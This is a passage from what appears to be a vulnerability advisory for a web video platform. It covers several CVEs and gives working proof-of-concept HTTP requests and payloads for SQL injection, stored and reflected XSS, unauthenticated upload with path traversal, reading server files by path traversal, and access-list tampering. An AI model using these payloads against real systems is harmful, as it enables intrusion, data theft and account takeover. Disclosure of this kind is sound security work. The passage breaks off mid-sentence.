credentials to gain privileged access. To abuse the vulnerability, an attacker can use the browser developer tool to permanently change the value of the ON cookie. By changing the value of the ON cookie for example to $VALID_COOKIE, the current privileges are set to the privileges of the original user who has the ON cookie $VALID_COOKIE. An attacker can gain administrative privileges and access other accounts by obtaining valid ON cookies for the respective accounts through brute force or information disclosure. One essential aspect is that the ON cookie is persistent and never changes, not even between sessions. Therefore, an attacker has permanent access to elevated privileges or other user accounts once a valid ON cookie is identified. 3) Broken Access Control (CVE-2022-45891) a) Unauthenticated Upload As described in chapter 1) Upload of Arbitrary Files Leading to Remote Code Execution an attacker has the possibility to upload arbitrary files. Once attackers know the correct POST request to upload files, they can repeat the same request without prior authentication and successfully upload arbitrary files. To verify the vulnerability the following request can be sent unauthenticated (without cookies) to the web server. =============================================================================== POST /Upload2.ashx?f=unauthenticated.txt&c=0&l=30&t=1662047867388&p=..\..\&ut=0&tc=0&bs=30&ct=1662047867388 HTTP/2 Host: $host SEC Consult - upload =============================================================================== As the following response shows, the file is being processed by the web server: =============================================================================== HTTP/2 200 OK Date: Mo, 19 Sep 2022 08:10:44 GMT Content-Length: 12 progress:100 =============================================================================== The unauthenticated file upload was verified by identifying the file unauthenticated.txt on the server. In conclusion, this vulnerability exacerbates the risk of the file upload vulnerability. It increases the likelihood of exploitation since it enables an attacker to upload files without authentication. b) Access Grant List An attacker needs to be authenticated with the role Member or Bypass to exploit the vulnerability. The vulnerability allows an attacker to modify the access list and grant himself access to private videos. Additionally, an attacker can make any video unavailable to other users by changing the access grant list. The vulnerability also applies to other content on the platform. To verify the vulnerability a video with restricted access is created. It can be accessed under the following URL: =============================================================================== https://$host/View.aspx?id=1337~4u~vE7bUKN5 =============================================================================== By executing the POST request shown below, an attacker can add himself to the access grant list and gain access to the private video. =============================================================================== POST /Ajax.asmx/SaveGrantAccessList HTTP/2 Host: $host Cookie: [...] Content-Type: application/json; charset=utf-8 Content-Length: 65 {"cdid":"1337","data":"[{\"Address\":\"test@attacker.com\",\"CanEdit\":true}]"} =============================================================================== The server responds with a status code 200 successful. =============================================================================== HTTP/2 200 OK Content-Type: application/json; charset=utf-8 Date: Thu, 01 Sep 2022 10:20:58 GMT [...] Content-Length: 75 {"d":"{\"Success\":true,\"Message\":\"Access list updated successfully\"}"} =============================================================================== The user with the e-mail address test@attacker.com has been added to the access grant list and can view the private video with the ID 1337. The vulnerability can also be leveraged to block access to the video for other users (Denial-of-Service) by adding any malicious content "malicious_payload" instead of the valid e-mail address. 4) SQL Injection (CVE-2022-45889) To demonstrate this vulnerability access to the search functionality in the statistic interface is required. An authenticated attacker with the role Publisher or Admin can use the following GET request to reproduce the vulnerability. =============================================================================== GET /Stats/StatisticsResults.aspx?q=viewingday&p1=20220831&p2=&db1=stats&db2=clipdata&flt=+s_RecordTypeID+IN+(1)+;WAITFOR+DELAY+'0:0:5'-- HTTP/2 Host: $host Cookie: [...] =============================================================================== The resulting response took more than five seconds. Thus it can be concluded that an SQL injection is present. Furthermore, exploitation by the tool sqlmap was possible and lead to a successful extraction of the complete backend database. 5) Multiple Stored Cross-Site Scripting (XSS) (CVE-2022-45892) a) Disclaimer An attacker needs to be authenticated with the role Admin to exploit the stored XSS vulnerability. The vulnerability will be executed afterwards for each user who logs into the web application. To verify the issue, an attacker needs to modify the disclaimer of the cookie description. In the admin section the system options can be modified to change the disclaimer text. =============================================================================== https://$host/Admin/SystemOptions.aspx?disclaimer=1 =============================================================================== By clicking the Source button, an admin user can inject a malicious payload. =============================================================================== <img src=x onerror=javascript:alert(location.origin)//"> =============================================================================== After saving the modified disclaimer text, the payload is executed by visiting different parts of the application. If a user visits the MyHome tab the payload is triggered in the browser. The payload is also executed if a user hasn't accepted the disclaimer text yet, which is true for any new user. b) Search Function An attacker needs to be authenticated with the role Member to exploit the stored XSS vulnerability. The vulnerability will be executed afterwards for each user, who inspects the statistic view provided by the web application. To verify the issue, an attacker can search for following malicious payload that is then automatically stored in the database. =============================================================================== <img onerror="javascript:alert(location.origin)" src="abcdef";//< =============================================================================== Afterwards, the malicious payload is triggered if a user lists the statistical data for the Search Breakdown in the last seven days. c) Comments An attacker needs to be authenticated with the role Member to exploit the stored XSS vulnerability. The vulnerability will be executed afterwards for each user, who visits the content element that contains the malicious comment. To verify the issue, the following malicious payload can be injected into the public or private comment field. =============================================================================== <img onerror="javascript:alert(location.origin)" src="abcdef";// =============================================================================== d) Batch editing tool An attacker needs to be authenticated with the role Admin to exploit the stored XSS vulnerability. The vulnerability will be executed afterwards for each user, who visits the modified content. To verify the issue, an attacker needs to modify the owner of the content. In the search section the admin has the possibility to use the Batch-Editing tool. =============================================================================== https://$host/Default.aspx?search=consult&o=8&page=1&fp=0&report=1&rlt=0 =============================================================================== By selecting the action Change owner, an admin user can inject a malicious payload in the user input box. =============================================================================== <img src=x onerror=javascript:alert(location.origin)//"> =============================================================================== After injecting the malicious payload, the XSS payload is executed when the content element is visited or when it appears in search results. =============================================================================== https://$host/Default.aspx?search=8298 https://$host/View.aspx?id=8298~4B~dpa3P9mb&psid=136 =============================================================================== e) Content Creation Permission to create content within the web application is required. Thus, an attacker needs to be authenticated with the role Editor, Publisher, or Admin to exploit the vulnerability. The issue can be verified by placing malicious HTML code in the title input field of the content creation dialog window. For this the following malicious payload can be used: =============================================================================== <img src='x' onerror='javascript:alert(location.origin)' style=' =============================================================================== When the content creation progress is finished, the JavaScript code is permanently stored in the web application. It will trigger in every browser that visits webpages that lists the modified item (for example, under the category view, search results and content list). The following content upload possibilities are affected by this vulnerability: - Upload Video or Audio files - Upload Documents - Add External Links - Playlist - Photoset f) Related Media HTML code can be injected in the title of the related media upload. Editing access to the content is required. This is normally the case for the users with the role Editors, Publishers or Admins. The malicious code can be injected in the title of the related content. To validate the vulnerability a new file must be uploaded in the related media tab. The next step is to change the filename to inject the malicious HTML and JavaScript code. =============================================================================== <img src='x' onerror='javascript:alert(location.origin)'photo.png =============================================================================== When the title including the malicious payload is saved and the page reloaded, the payload within the title will be executed. The new title is stored in the web application along with the malicious HTML code. It will execute in any browser that visits the content item. Opening the related media tab is not necessary. g) Create new user An attacker needs to be authenticated with the role Admin to exploit the stored XSS vulnerability. The vulnerability will be executed afterwards for admin users in the user section and for the created users once they are logged in. To verify the issue, an attacker needs to create a new user. Under Tools -> Admin -> Users, Permissions, Authentication -> Users the admin has the possibility to create new users. =============================================================================== https://$host/Admin/EditUser.aspx =============================================================================== The following malicious payload was added to the Full Name input field: =============================================================================== <script>alert(location.origin)</script> =============================================================================== After creating the new user, the malicious payload gets executed once the new user logs in or the admin visits the user section (Tools -> Admin -> Users, Permissions, Authentication -> Users). h) Change Username A cross-site scripting vulnerability can be found under https://$host/MyHome.aspx where a user can edit the name shown on his home page. All authenticated users can access home pages of other users and are thus affected by this vulnerability. Furthermore, the vulnerability can be exploited by an authenticated user of any role. The following request was used to change the username. =============================================================================== POST /Ajax.asmx/SaveLayoutData HTTP/2 Host: $host Cookie: [...] Content-Length: 360 Content-Type: application/json; charset=UTF-8 [...] {"id":$ID,"layoutdata":"[{\"title\":{\"enabled\":true,\"text\":\"test<img src='x' onerror='alert(location.origin)'\",[...] =============================================================================== The request is accepted by the web application as shown below: =============================================================================== HTTP/2 200 OK Content-Type: application/json; charset=utf-8 Content-Length: 92 {"d":"{\"Success\":true,\"Message\":\"Layout erfolgreich gespeichert\",\"HTML\": [\"455\"]}"} =============================================================================== Sending the request directly bypasses the check for special characters like < or > that exist in the frontend. The malicious username string is embedded on the website and will execute when it is opened in the browser in any subsequent request. 6) Reflected Cross-Site Scripting (XSS) (CVE-2022-45890) An attacker needs authenticated access to the web application with the role Member or higher to identify and exploit the vulnerability. To identify this vulnerability, it is sufficient to open the following URL (no special manipulation of the request is needed) and analyze the HTTP response from the web server: =============================================================================== https://$host/Default.aspx?search=test&page=1&fp=0&r=(0_7_0_%3Ch1%3ESEC%20Consult%3C/h1%3E__) =============================================================================== The string SEC Consult is embedded in the webpage of this URL. The next step is to identify a working payload which triggers the cross-site scripting vulnerability. To verify the vulnerability, it is sufficient to open the following URL: =============================================================================== https://$host/Default.aspx?search=*&o=8&page=1&fp=0&r=(0_7_0_%3Cscript%3Ealert(location.origin)%3C/script%3E__) =============================================================================== Another working payload for the fo parameter was identified: =============================================================================== https://$host/Default.aspx?search=*&fo=%3Cimg%20onerror=%22javascript:alert(location.origin)%22%20src=%22abcdef%22;// =============================================================================== It must be mentioned that all metadata filter fields are affected by this vulnerability. 7) Path Traversal (CVE-2022-45894) An attacker authenticated with the role Member can navigate to the vulnerable URL path provided below and inject "..\" sequences to move up directories on the web server and access local files. Simply navigating to the link with the injected path traversal payload an attacker can download any file on the web server and read its contents. To verify the vulnerability the file NetSetup.LOG which contains details of the entire process of joining the domain was downloaded. The following URL was used: =============================================================================== https://$host/GetFile.aspx?file=/image/..\..\..\..\..\..\..\..\..\..\Windows\debug\NetSetup.LOG =============================================================================== 8) Information Disclosure (CVE-2022-45895) a) ON cookie The information disclosure of the ON cookie was identified on three different pages of the web application. Since the cookie can be used to access other user accounts with elevated privileges, it comprises highly confidential information. It is embedded in the web application's response in different ways and there are always multiple cookies for different users in the response. Requests to obtain the sensitive information can be performed with authentication as arbitrary user. The ON cookie was embedded in three pages that are accessible under the following paths: - /Default.aspx?catid=69 (HTML) - /Default.aspx?search=*&o=8&page=1&report=1&rlt=0&export=1&t=1661787629149 (CSV) - /GetJson.aspx?t=1&display=3&data=69&source=2&o=8&title= (JSON) As an example the ON cookie leakage is shown in the HTML response. The cookie value can be identified in the href and src attributes of the a element ($VALID_COOKIE). =============================================================================== [...] <div><a title="Open Media" tabindex="-1" href="/View.aspx?id=228~$VALID_COOKIE"> <img title="228" data-alt-src="" src="/Media/Images/ClipData/228_$VALID_COOKIE.jpg"/></a> [...] =============================================================================== b) WhoAmI The sensitive data comprises internal information that lets an attacker gain deeper knowledge about the application. To verify the vulnerability, it is sufficient to request the following URL as authenticated user (any role): =============================================================================== https://$host/WhoAmI.aspx =============================================================================== An excerpt of the disclosed information is shown: ================